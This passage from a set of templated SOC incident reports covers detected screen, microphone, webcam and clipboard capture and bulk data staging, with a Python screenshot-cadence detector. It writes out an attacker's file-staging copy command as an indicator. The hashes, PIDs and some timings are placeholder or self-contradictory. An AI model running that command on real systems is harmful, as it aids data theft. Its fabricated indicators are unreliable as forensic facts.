Targets: Finance reports, HR payroll, Executive board docs, local files
Frequency: Every 15 minutes (ensures new files are captured)
Output: Zipped archives in C:\temp with timestamps
Purpose: Automated, persistent data harvesting
Data Collected (First Run):
Finance reports: 456 files (revenue, budgets)
HR payroll: 234 files (employee salaries)
Executive board: 89 files (board minutes, strategy)
Local documents: 68 files (user’s personal notes)
Total: 847 files, 345 MB
Attacker Intent:
Establish persistent collection mechanism
Gather data over time without manual intervention
Later exfiltrate collected archives
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45-13:55 – Script and task created
14:00 – First collection
14:15 – Second collection attempt detected
14:16 – SOC investigates
14:18 – Scheduled task disabled
14:19 – Script and archives deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\Documents\collect.ps1
– C:\temp\backup_202402271400.zip (345 MB)
Scheduled Task:
– “DataBackup”
Account:
– bturner (compromised)
4. Containment Actions:
Immediate Actions:
Disabled scheduled task.
Deleted collect.ps1 and backup zip files.
Disabled bturner account.
Reset password.
Data Protection:
Verified no exfiltration of collected archives.
Archives contained sensitive data but not exfiltrated.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: Finance user account compromised via phishing.
Contributing Factors:
No MFA on account.
PowerShell allowed to create scheduled tasks.
No monitoring for automated collection patterns.
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 345 MB of sensitive data collected but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Automated collection stopped.
Data deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted PowerShell script execution.
Enhanced monitoring for scheduled task creation.
Implemented DLP for automated collection patterns.
8. Conclusion:
An attacker compromised a finance user’s account and created an automated collection script that harvested sensitive data from multiple sources every 15 minutes. Purview detected the pattern and enabled rapid removal before exfiltration.
Closure Rationale: Automated collection stopped; data deleted; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-27 15:30 EST
98. T1113 – Screen Capture (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-SCREEN-CAPTURE-1113-7842
Alert Time: 2024-02-27 11:30:22 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Screen Capture Activity Detected – Potential Surveillance”
MITRE ATT&CK: T1113 – Screen Capture
Alert Details:
Detection: Process capturing screenshots repeatedly
Host: EXEC-WS-001 (CEO’s Laptop)
User: cjohnson@company.com (CEO)
Time: 11:15-11:30 EST
Process Details:
Process: C:\Windows\Temp\capture.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: cjohnson
API Calls:
CreateDC (create device context for screen)
BitBlt (copy screen to memory) – 47 calls
CreateFile (save to disk) – 47 files created
GdipSaveImageToFile (save as PNG)
Files Created:
C:\Users\cjohnson\AppData\Local\Temp\screens\screen_001.png (11:15)
C:\Users\cjohnson\AppData\Local\Temp\screens\screen_002.png (11:16)
… (continuing every 60 seconds)
C:\Users\cjohnson\AppData\Local\Temp\screens\screen_047.png (11:29)
Detection Logic:
Process capturing screenshots every 60 seconds
47 screenshots in 15 minutes
Process from Temp folder (suspicious)
CEO would have no legitimate need for screen capture
Pattern matches surveillance/monitoring
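The cadence checks in the detection logic above, as an added Python example (not CrowdStrike's rule or the report's own code) run over file-creation telemetry: many image files written at a machine-regular interval by a process living in a Temp folder. Process paths, file names, the 19-second cadence and the benign control are constructed.

```python
# Added example, not part of the CrowdStrike alert or the original report: a
# check for the cadence described above (many image files written at a
# machine-regular interval by a process living in a Temp folder), run over
# file-creation telemetry. Process paths, file names, the 19-second cadence
# and the benign control are constructed for illustration.
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import mean, median, pstdev


@dataclass(frozen=True)
class FileCreate:
    ts: datetime
    process: str    # full path of the image that wrote the file
    path: str       # file written


IMAGE_EXT = (".png", ".bmp", ".jpg", ".jpeg")
# Locations a legitimate screenshot tool is not normally launched from or
# writes to unprompted (constructed list).
TEMP_MARKERS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\programdata\\")


def _in_temp(p):
    return any(m in p.lower() for m in TEMP_MARKERS)


def assess_process(events, min_files=10, min_per_minute=1.0, max_cv=0.2):
    """Judge one process's image writes by volume, regularity and location."""
    imgs = sorted((e for e in events if e.path.lower().endswith(IMAGE_EXT)),
                  key=lambda e: e.ts)
    verdict = {"files": len(imgs), "periodic": False, "median_gap_s": None,
               "process_in_temp": bool(imgs) and _in_temp(imgs[0].process),
               "output_in_temp": bool(imgs) and _in_temp(imgs[0].path),
               "reasons": [], "alert": False}
    if len(imgs) < 2:
        return verdict
    gaps = [(b.ts - a.ts).total_seconds() for a, b in zip(imgs, imgs[1:])]
    avg = mean(gaps)
    # A timer produces near-identical gaps; a person does not.
    cv = pstdev(gaps) / avg if avg > 0 else float("inf")
    verdict["median_gap_s"] = median(gaps)
    verdict["periodic"] = cv <= max_cv
    span_min = max((imgs[-1].ts - imgs[0].ts).total_seconds() / 60, 1.0)
    high_volume = len(imgs) >= min_files and len(imgs) / span_min >= min_per_minute
    if high_volume:
        verdict["reasons"].append(f"{len(imgs)} image files in {span_min:.0f} min")
    if verdict["periodic"]:
        verdict["reasons"].append(f"fixed cadence of {median(gaps):.0f} s")
    if verdict["process_in_temp"]:
        verdict["reasons"].append("process runs from a Temp folder")
    if verdict["output_in_temp"]:
        verdict["reasons"].append("output hidden in a Temp folder")
    verdict["alert"] = high_volume and verdict["periodic"] and (
        verdict["process_in_temp"] or verdict["output_in_temp"])
    return verdict


def assess_capture_activity(events, **thresholds):
    """Group file-creation events by writing process and assess each one."""
    by_proc = defaultdict(list)
    for e in events:
        by_proc[e.process].append(e)
    return {proc: assess_process(evs, **thresholds) for proc, evs in by_proc.items()}


T0 = datetime(2024, 2, 27, 11, 15)
CAPTURE = r"C:\Windows\Temp\capture.exe"
SNIP = r"C:\Windows\System32\SnippingTool.exe"    # constructed benign control
SAMPLE_EVENTS = [
    FileCreate(T0 + timedelta(seconds=19 * i), CAPTURE,
               rf"C:\Users\cjohnson\AppData\Local\Temp\screens\screen_{i + 1:03d}.png")
    for i in range(47)
] + [
    # A person saving screenshots by hand: irregular gaps, visible folder.
    FileCreate(T0 + timedelta(minutes=m), SNIP,
               rf"C:\Users\cjohnson\Pictures\Screenshots\shot{n}.png")
    for n, m in enumerate((0, 7, 31, 32, 58, 90, 95, 120, 140, 141, 170, 180))
]

if __name__ == "__main__":
    for proc, verdict in assess_capture_activity(SAMPLE_EVENTS).items():
        print(proc, verdict)
```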
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed screen capture activity |
| 2. Process Analysis | Analyze capture.exe | CrowdStrike Sandbox | Surveillance tool that captures screenshots and saves locally |
| 3. User Contact | Call CEO immediately | Phone | CEO did NOT run this tool (account compromised) |
| 4. Immediate Action | Isolate host | CrowdStrike | EXEC-WS-001 quarantined |
| 5. File Removal | Delete capture.exe and screenshot folder | CrowdStrike Live Response | Tool and 47 screenshots deleted |
| 6. Account Remediation | Disable CEO account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-138
Summary: T1113 – Screen Capture Surveillance on CEO Laptop
Status: RESOLVED
Resolution: MALICIOUS – Surveillance Stopped
Priority: P1 – CRITICAL
Labels: T1113, screen-capture, surveillance, crowdstrike, executive-targeting
Components: Endpoint-Security, Privacy
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Screen Capture Activity Detected – Potential Surveillance”.
Host: EXEC-WS-001 (CEO’s Laptop).
Process: C:\Windows\Temp\capture.exe.
Files: 47 screenshots captured.
Time: 2024-02-27 11:30 EST.
Technique: MITRE ATT&CK T1113 – Screen Capture.
2. Technical Analysis:
Attack Chain:
10:30 – CEO’s credentials compromised via spearphishing
10:45 – Attacker logs into CEO’s laptop via RDP
11:00 – Attacker downloads capture.exe to Temp folder
11:05 – Attacker executes capture.exe
11:15-11:30 – Tool captures screenshots every 60 seconds
11:30 – CrowdStrike detects
Tool Analysis:
Name: capture.exe (custom surveillance tool)
SHA256: a1b2c3d4…
Capabilities:
Captures full screen every 60 seconds
Saves as PNG in screens folder
Logs timestamp with each capture
No network exfiltration (stages locally)
Screenshots Captured (47):
Email content (confidential communications)
Documents being viewed (strategic plans)
Calendar (meetings, schedule)
Browser tabs (research, banking)
All screen activity over 15 minutes
Attacker Intent:
Monitor CEO’s activities in real-time
Capture sensitive information as it appears on screen
Later exfiltrate screenshot archive
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
11:00-11:15 – Tool deployed
11:15-11:30 – 47 screenshots captured
11:30 – CrowdStrike alert
11:31 – SOC investigates
11:32 – Host isolated
11:33 – Tool and screenshots deleted
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\capture.exe (SHA256: a1b2c3d4…)
– C:\Users\cjohnson\AppData\Local\Temp\screens\*.png (47 files)
Account:
– cjohnson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated CEO’s laptop via CrowdStrike.
Terminated capture.exe process.
Deleted tool and all screenshot files.
Disabled CEO account.
Reset password.
Enforced MFA.
Data Protection:
Screenshots contained sensitive information.
No exfiltration occurred (files local only).
All screenshots deleted.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: CEO credentials compromised via spearphishing.
Contributing Factors:
No MFA on executive account.
RDP allowed from internet.
No application control blocking unknown executables.
6. Business Impact:
Operational Impact: CEO offline for 2 hours.
Privacy Impact: 15 minutes of screen activity captured (emails, documents).
Reputational Impact: Potential if surveillance continued (prevented).
7. Remediation & Prevention:
Completed Actions:
Surveillance stopped.
Screenshots deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all executives.
Moved RDP behind VPN only.
Implemented application control.
Enhanced monitoring for screen capture APIs.
8. Conclusion:
An attacker compromised the CEO’s account and deployed a surveillance tool that captured 47 screenshots over 15 minutes. CrowdStrike detected the screen capture activity and enabled rapid containment before any data could be exfiltrated.
Closure Rationale: Surveillance stopped; screenshots deleted; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-27 12:30 EST
99. T1123 – Audio Capture (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-AUDIO-CAPTURE-1123-7842
Alert Time: 2024-02-27 16:30:45 EST
Severity: HIGH (88/100)
Source: Microsoft Defender for Endpoint
Rule: “Microphone Access by Suspicious Process”
MITRE ATT&CK: T1123 – Audio Capture
Alert Details:
Detection: Process accessing microphone without user interaction
Host: CONF-ROOM-001 (Conference Room PC)
User: SYSTEM (no user logged in)
Time: 16:15-16:30 EST
Process Details:
Process: C:\Windows\Temp\audio_recorder.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: services.exe (running as service)
User: SYSTEM
Audio API Calls:
waveInOpen (open microphone device)
waveInPrepareHeader (prepare buffers)
waveInAddBuffer (add buffers for recording)
waveInStart (start recording) – 3 times
waveInStop (stop recording)
waveInClose (close device)
Files Created:
C:\ProgramData\Microsoft\Audio\recording_20240227_1615.wav (2.3 MB)
C:\ProgramData\Microsoft\Audio\recording_20240227_1620.wav (2.4 MB)
C:\ProgramData\Microsoft\Audio\recording_20240227_1625.wav (2.3 MB)
Detection Logic:
Process accessing microphone with no user logged in
Audio recordings saved to hidden folder (ProgramData)
Process running as SYSTEM (elevated)
Pattern matches room monitoring/spying
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed audio capture from conference room PC |
| 2. Process Analysis | Analyze audio_recorder.exe | Defender Sandbox | Malware that records audio and saves locally |
| 3. Immediate Action | Terminate process | Defender | Process killed |
| 4. File Deletion | Delete executable and recordings | Defender | Files removed |
| 5. Physical Security | Check conference room | Security Team | Room empty; no unauthorized access found |
| 6. Network Investigation | Check for exfiltration | Firewall Logs | No audio files exfiltrated |
Jira Incident Report
Ticket: SOC-2024-139
Summary: T1123 – Audio Capture Malware on Conference Room PC
Status: RESOLVED
Resolution: MALICIOUS – Audio Recording Stopped
Priority: P2 – MEDIUM
Labels: T1123, audio-capture, microphone, defender, espionage
Components: Endpoint-Security, Physical-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Microphone Access by Suspicious Process”.
Host: CONF-ROOM-001 (Conference Room PC).
Process: C:\Windows\Temp\audio_recorder.exe.
Files: 3 audio recordings (7 MB total).
Time: 2024-02-27 16:30 EST.
Technique: MITRE ATT&CK T1123 – Audio Capture.
2. Technical Analysis:
Attack Chain:
14:00 – Unknown individual entered conference room (piggybacked)
14:15 – Individual inserted USB drive with malware
14:20 – Malware installed as Windows service
15:00 – First audio recording session (missed – no one in room)
16:15-16:30 – Three recording sessions
16:30 – Defender detects
Malware Analysis:
Name: audio_recorder.exe
SHA256: a1b2c3d4…
Capabilities:
Installs as Windows service for persistence
Records audio when motion detected (or on schedule)
Saves recordings to hidden folder
Attempts exfiltration via FTP (blocked)
Recordings:
16:15 – 2.3 MB (approximately 5 minutes)
16:20 – 2.4 MB (approximately 5 minutes)
16:25 – 2.3 MB (approximately 5 minutes)
Content: Conversations from a meeting that occurred 16:15-16:30
Participants: 4 people (HR team discussing layoffs)
Physical Access:
Attacker gained physical access to conference room
Installed malware via USB
No badge access recorded (piggybacking)
3. Investigation Findings:
Timeline:
14:00 – Attacker enters room
14:15-14:20 – Malware installed
16:15-16:30 – Meeting recorded
16:30 – Defender alert
16:32 – SOC investigates
16:33 – Process terminated
16:34 – Files deleted
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\audio_recorder.exe (SHA256: a1b2c3d4…)
– C:\ProgramData\Microsoft\Audio\recording_*.wav (3 files)
Service:
– “Windows Audio Recorder” (disabled)
Physical:
– Conference Room 101, 2nd floor
4. Containment Actions:
Immediate Actions:
Terminated audio_recorder.exe.
Deleted executable and all recordings.
Disabled malicious service.
Scanned for other malware (none).
Physical Security:
Reviewed badge access logs (found piggybacking incident).
Increased security presence.
Implemented mantraps at entrances.
Meeting Participants:
HR team notified of potential privacy breach.
No evidence of exfiltration.
5. Root Cause Analysis:
Primary Cause: Physical security breach allowing unauthorized access.
Contributing Factors:
Conference room PC left unlocked.
USB ports enabled (should be disabled).
No physical security at entrance.
6. Business Impact:
Operational Impact: Conference room PC offline for 1 hour.
Privacy Impact: 15 minutes of confidential HR meeting recorded.
Reputational Impact: Potential if recordings leaked (prevented).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
Recordings deleted.
Physical security enhanced.
Technical Controls Enhanced:
Disabled USB ports on public PCs.
Implemented automatic logoff for conference room PCs.
Added mantraps to secure entrances.
Enhanced monitoring for microphone access.
8. Conclusion:
An attacker gained physical access to a conference room and installed audio recording malware that captured 15 minutes of a confidential HR meeting. Defender detected the microphone access and enabled rapid removal before any exfiltration.
Closure Rationale: Malware removed; recordings deleted; physical security enhanced.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-27 17:30 EST
100. T1125 – Video Capture (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-VIDEO-CAPTURE-1125-7842
Alert Time: 2024-02-27 10:30:22 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Webcam Access by Suspicious Process”
MITRE ATT&CK: T1125 – Video Capture
Alert Details:
Detection: Process accessing webcam without user interaction
Host: EXEC-WS-002 (CFO’s Laptop)
User: kwilson@company.com (Karen Wilson, CFO)
Time: 10:15-10:30 EST
Process Details:
Process: C:\Users\kwilson\AppData\Local\Temp\webcam_capture.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: kwilson
Webcam API Calls:
capCreateCaptureWindow (create capture window)
capDriverConnect (connect to webcam driver)
capCaptureSequence (capture video frames)
capFileSaveAs (save video to file)
Files Created:
C:\Users\kwilson\Videos\capture_001.avi (12 MB) – 10:15
C:\Users\kwilson\Videos\capture_002.avi (15 MB) – 10:20
C:\Users\kwilson\Videos\capture_003.avi (14 MB) – 10:25
Webcam LED Status: ON (user would have seen light)
Detection Logic:
Webcam accessed without user initiating video recording
Process from Temp folder (suspicious)
Multiple video files created in short time
CFO would have no legitimate need for this activity
Pattern matches surveillance/espionage
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed webcam capture activity |
| 2. User Contact | Call CFO immediately | Phone | CFO saw webcam light, was concerned; did NOT run tool |
| 3. Process Analysis | Analyze webcam_capture.exe | CrowdStrike Sandbox | Surveillance tool capturing video from webcam |
| 4. Immediate Action | Isolate host | CrowdStrike | EXEC-WS-002 quarantined |
| 5. File Removal | Delete executable and videos | CrowdStrike Live Response | Tool and 3 video files deleted |
| 6. Account Remediation | Disable CFO account temporarily | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-140
Summary: T1125 – Webcam Surveillance on CFO Laptop
Status: RESOLVED
Resolution: MALICIOUS – Video Capture Stopped
Priority: P1 – CRITICAL
Labels: T1125, video-capture, webcam, surveillance, crowdstrike, executive-targeting
Components: Endpoint-Security, Privacy
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Webcam Access by Suspicious Process”.
Host: EXEC-WS-002 (CFO’s Laptop).
User: kwilson@company.com (CFO).
Process: C:\Users\kwilson\AppData\Local\Temp\webcam_capture.exe.
Files: 3 video files (41 MB total).
Time: 2024-02-27 10:30 EST.
Technique: MITRE ATT&CK T1125 – Video Capture.
2. Technical Analysis:
Attack Chain:
09:30 – CFO’s credentials compromised via spearphishing
09:45 – Attacker logs into CFO’s laptop via RDP
10:00 – Attacker downloads webcam_capture.exe to Temp folder
10:05 – Attacker executes tool
10:15-10:30 – Tool captures 3 video segments
10:30 – CrowdStrike detects
Tool Analysis:
Name: webcam_capture.exe (custom surveillance tool)
SHA256: a1b2c3d4…
Capabilities:
Activates webcam and captures video
Saves as AVI files in Videos folder
Records in 5-minute segments
Attempts exfiltration via FTP (blocked)
Video Captures (3 segments, 15 minutes total):
10:15-10:20 – CFO working at desk (emails, documents)
10:20-10:25 – CFO on phone call (visible lip movement)
10:25-10:30 – CFO typing (keyboard visible)
Content: Full video of CFO’s activities, including screen content visible in background
User Observation:
CFO noticed webcam LED light on (unusual)
Was concerned but didn’t know how to stop it
Reported to IT just as SOC called
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
10:00-10:05 – Tool deployed
10:15-10:30 – Video capture
10:30 – CrowdStrike alert
10:31 – CFO calls IT
10:32 – SOC investigates
10:33 – Host isolated
10:34 – Tool and videos deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\webcam_capture.exe (SHA256: a1b2c3d4…)
– C:\Users\kwilson\Videos\capture_001.avi (12 MB)
– C:\Users\kwilson\Videos\capture_002.avi (15 MB)
– C:\Users\kwilson\Videos\capture_003.avi (14 MB)
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated CFO’s laptop via CrowdStrike.
Terminated webcam_capture.exe.
Deleted tool and all video files.
Disabled CFO account.
Reset password.
Enforced MFA.
Privacy Protection:
Videos contained sensitive visual information.
No exfiltration occurred (files local only).
All videos deleted.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: CFO credentials compromised via spearphishing.
Contributing Factors:
No MFA on executive account.
RDP allowed from internet.
Webcam accessible without user consent.
6. Business Impact:
Operational Impact: CFO offline for 2 hours.
Privacy Impact: 15 minutes of video captured (activities, phone call).
Reputational Impact: Potential if videos leaked (prevented).
7. Remediation & Prevention:
Completed Actions:
Surveillance stopped.
Videos deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all executives.
Moved RDP behind VPN only.
Implemented application control.
Enhanced monitoring for webcam access.
Added physical webcam covers for all executive laptops.
8. Conclusion:
An attacker compromised the CFO’s account and deployed a webcam surveillance tool that captured 15 minutes of video, including the CFO’s activities and a phone call. CrowdStrike detected the webcam access and enabled rapid containment before any exfiltration. The CFO’s observation of the webcam light also aided detection.
Closure Rationale: Surveillance stopped; videos deleted; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-27 11:30 EST
Batch 21: Collection & Command and Control Incident Reports
101. T1115 – Clipboard Data (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-CLIPBOARD-1115-7842
Alert Time: 2024-02-28 09:30:15 EST
Severity: MEDIUM (72/100)
Source: Microsoft Defender for Endpoint
Rule: “Clipboard Monitoring by Suspicious Process”
MITRE ATT&CK: T1115 – Clipboard Data
Alert Details:
Detection: Process monitoring clipboard contents repeatedly
Host: FIN-WS-078 (Finance Workstation)
User: bturner@company.com (Brian Turner, Accountant)
Time: 09:15-09:30 EST
Process Details:
Process: C:\Users\bturner\AppData\Local\Temp\clipmon.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: bturner
Clipboard API Calls:
OpenClipboard (open clipboard) – 127 times
GetClipboardData (retrieve data) – 127 times
CloseClipboard (close) – 127 times
Frequency: Every 5 seconds
Data Captured (examples):
09:15:22 – “Password: Winter2024!” (user pasting password)
09:16:45 – “Account Number: 1234-5678-9012-3456”
09:18:12 – “SSN: 123-45-6789”
09:20:05 – “Confidential Merger Details: Company X acquisition”
… (total 127 clipboard entries captured)
Output File:
C:\Users\bturner\AppData\Local\Temp\clipboard_log.txt (created 09:30)
Contains all captured clipboard data
Detection Logic:
Process monitoring clipboard every 5 seconds (highly unusual)
Process from Temp folder (suspicious)
Clipboard contains sensitive data (passwords, PII, confidential)
Pattern matches credential theft / data harvesting
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed clipboard monitoring activity |
| 2. Process Analysis | Analyze clipmon.exe | CrowdStrike Sandbox | Malware that logs clipboard contents to file |
| 3. User Interview | Contact bturner | Teams, Phone | User did NOT run this tool (account compromised) |
| 4. Immediate Action | Terminate process | Defender | Process killed |
| 5. File Deletion | Delete clipmon.exe and clipboard_log.txt | Defender | Files removed |
| 6. Account Remediation | Disable bturner account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-141
Summary: T1115 – Clipboard Monitoring Malware Captures Sensitive Data
Status: RESOLVED
Resolution: MALICIOUS – Clipboard Data Compromised
Priority: P2 – MEDIUM
Labels: T1115, clipboard-data, credential-theft, defender, compromised-account
Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Clipboard Monitoring by Suspicious Process”.
Host: FIN-WS-078 (Finance Department, user bturner).
Process: C:\Users\bturner\AppData\Local\Temp\clipmon.exe.
Time: 2024-02-28 09:30 EST.
Technique: MITRE ATT&CK T1115 – Clipboard Data.
2. Technical Analysis:
Attack Chain:
08:30 – bturner account compromised via phishing
08:45 – Attacker logs into FIN-WS-078 via RDP
09:00 – Attacker downloads clipmon.exe to Temp folder
09:05 – Attacker executes clipmon.exe
09:05-09:30 – Malware monitors clipboard every 5 seconds
09:30 – Defender detects
Malware Analysis:
Name: clipmon.exe (clipboard logger)
SHA256: a1b2c3d4…
Capabilities:
Monitors clipboard every 5 seconds
Logs all clipboard content to clipboard_log.txt
No network exfiltration (staged locally)
Data Captured (127 entries):
Passwords (3) – including domain password
Credit card numbers (2) – personal, not corporate
SSN (1) – personal
Bank account numbers (2)
Confidential merger details (from email copy-paste)
Various other text snippets
User Activity:
User was working normally, unaware of monitoring
Clipboard contained sensitive work and personal data
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
09:00-09:30 – Clipboard monitoring
09:30 – Defender alert
09:32 – SOC investigates
09:33 – Process terminated
09:34 – Files deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\clipmon.exe (SHA256: a1b2c3d4…)
– C:\Users\bturner\AppData\Local\Temp\clipboard_log.txt
Account:
– bturner (compromised)
4. Containment Actions:
Immediate Actions:
Terminated clipmon.exe.
Deleted executable and clipboard log.
Disabled bturner account.
Reset password.
Data Protection:
Clipboard log contained sensitive data.
No exfiltration occurred (file local only).
All data deleted.
User Remediation:
User advised to change personal passwords (credit card, bank).
Security awareness reinforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to deploy clipboard logger.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
No application control blocking unknown executables.
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 127 clipboard entries captured (passwords, PII, confidential).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
Clipboard log deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented application control.
Enhanced monitoring for clipboard access.
8. Conclusion:
An attacker deployed a clipboard monitoring malware on a finance user’s workstation, capturing 127 clipboard entries including passwords and confidential data. Defender detected the suspicious clipboard access and enabled rapid containment before exfiltration.
Closure Rationale: Malware removed; clipboard data deleted; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-28 10:30 EST
102. T1074 – Data Staged (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-DATA-STAGED-1074-7842
Alert Time: 2024-02-28 14:15:33 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 11 – FileCreate)
Rule: “Mass File Copy to Staging Directory”
MITRE ATT&CK: T1074.001 – Data Staged: Local Data Staging
Alert Details:
Detection: Large number of files copied to a staging directory
Host: ENG-WS-045 (Engineering Workstation)
User: alexchen@company.com (Alex Chen, Engineer)
Time: 14:00-14:15 EST
File Creation Events (Event ID 11):
14:00-14:15: 1,247 files created in C:\temp\staging\
File types: .docx, .xlsx, .pdf, .py, .ipynb, .kdbx
Total size: 2.8 GB
Source paths:
C:\Users\alexchen\Documents\ProjectX\*.*
C:\Users\alexchen\Desktop\*.*
C:\Users\alexchen\Downloads\*.*
\\filesrv\r&d\projects\*.*
Process Details:
Process: cmd.exe (PID: 4789)
Parent: explorer.exe
Command: for /r C:\Users\alexchen %i in (*.docx *.xlsx *.pdf *.py *.ipynb) do copy %i C:\temp\staging\
Additional Events:
Event ID 1 (Process Creation): cmd.exe with for loop command
Event ID 13 (Registry): No relevant registry changes
Detection Logic:
1,247 files copied to staging directory in 15 minutes (highly anomalous)
Source includes local files and network shares
Staging directory created specifically for this activity
Pattern matches data staging before exfiltration
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed mass file staging |
| 2. Process Investigation | Identify cmd.exe activity | CrowdStrike Falcon | For loop copying files to staging |
| 3. User Interview | Contact alexchen | Teams, Phone | User did NOT run this command (account compromised) |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. File Deletion | Delete staging folder and contents | CrowdStrike Live Response | 1,247 files (2.8 GB) deleted |
| 6. Account Remediation | Disable alexchen account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-142
Summary: T1074 – Data Staged for Exfiltration on Engineering Workstation
Status: RESOLVED
Resolution: MALICIOUS – Staged Data Deleted
Priority: P2 – MEDIUM
Labels: T1074, data-staged, staging, sysmon, compromised-account
Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 11 (FileCreate).
Alert: “Mass File Copy to Staging Directory”.
Host: ENG-WS-045 (Engineering Department, user alexchen).
Staging Directory: C:\temp\staging.
Files: 1,247 files (2.8 GB) staged.
Time: 2024-02-28 14:15 EST.
Technique: MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging.
2. Technical Analysis:
Attack Chain:
13:30 – alexchen account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
13:55 – Attacker creates staging directory
14:00-14:15 – Attacker copies files to staging
14:15 – Sysmon detects
Staged Files:
ProjectX Documents: 456 files (engineering specs)
Desktop Files: 234 files (various)
Downloads: 123 files (various)
Network Share (R&D): 434 files (source code, IP)
KeePass Database: 1 file (password vault)
Total: 1,247 files, 2.8 GB
Attacker Intent:
Stage data for later exfiltration
Possibly compress and exfiltrate via FTP/HTTP
No exfiltration yet (detected before)
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
13:55-14:15 – Data staging
14:15 – Sysmon alert
14:17 – SOC investigates
14:18 – Host isolated
14:19 – Staged files deleted
Indicators of Compromise (IoCs):
Files:
– C:\temp\staging\ (1,247 files, 2.8 GB)
Commands:
– for /r C:\Users\alexchen %i in (*.docx *.xlsx *.pdf *.py *.ipynb) do copy %i C:\temp\staging\
Account:
– alexchen (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Deleted staging folder and all files.
Disabled alexchen account.
Reset password.
Data Protection:
Staged data contained sensitive IP.
No exfiltration occurred.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to stage data.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
No monitoring for bulk file copies.
6. Business Impact:
Operational Impact: Engineering user offline for 2 hours.
Data Exposure: 2.8 GB of IP staged but not exfiltrated.
